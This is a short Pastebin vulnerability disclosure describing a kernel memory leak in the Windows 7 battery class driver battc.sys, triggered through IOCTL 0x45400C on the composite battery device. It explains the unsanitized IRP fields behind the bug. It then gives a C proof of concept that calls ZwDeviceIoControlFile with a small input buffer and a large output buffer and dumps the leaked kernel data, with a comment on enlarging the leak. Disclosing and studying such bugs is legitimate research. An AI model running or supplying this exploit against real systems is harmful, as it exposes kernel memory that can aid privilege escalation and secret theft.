waliedassar

BATTC.SYS!BatteryClassIoctl Kernel Memory Disclosure

Oct 23rd, 2021
889
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Description
  2. Battc.sys is prone to kernel memory disclosure when the "BatteryClassIoctl" function processes IO Control Code 0x45400C. By calling the "ntdll!ZwDeviceIoControlFile" function on device "\device\compositebattery" with the "InputBufferLength" parameter set to a value much less than that of the "OutputBufferLength" parameter, we cause the "nt!IopCompleteRequest" function to leak data to the output buffer. This is due "BatteryClassIoctl" function not sanitizing  
  3.  
  4. pIRP->IoStatus.Information and
  5.  
  6. pIRP->Tail.Overlay.CurrentStackLocation.Parameters.DeviceIoControl.OutputBufferLength and  
  7.  
  8. pIRP->AssociatedIrp.SystemBuffer
  9.  
  10. .
  11.  
  12. ---- Reproduced as follows ---------------
  13.  
  14.     memset(pIn,0xCC,0x1000);
  15.  
  16.     memset(pOut,0xCC,0x1000);
  17.  
  18. _IO_STATUS_BLOCK IOB={0};
  19.  
  20.     ulong IoCode = 0x45400C;
  21.  
  22.  
  23. ulong InSize = 0x10;
  24.  
  25. ulong OutSize = 0x1000;//increase this value to disclose more
  26.  
  27. printf("InSize: %X, OutSize: %X\r\n",InSize,OutSize);
  28.  
  29. int ret = ZwDeviceIoControlFile(hDevice,
  30.                             0 /*hEVent*/,
  31.                             0 /*ApcRoutine*/,
  32.                             0 /*ApcContext*/,
  33.                             &IOB,
  34.                             IoCode,
  35.                             pIn,
  36.                             InSize,
  37.                             pOut,
  38.                             OutSize);
  39.  
  40. printf("ZwDeviceIoControlFile, ret: %X\r\n",ret);
  41. DumpHex_8(pOut,0x1000);
  42. //------------------------------------
  43.  
  44. Vulnerable file version: 6.1.7600.16385
  45.  
  46. Test on Windows 7-64Bit SP1
RAW Paste Data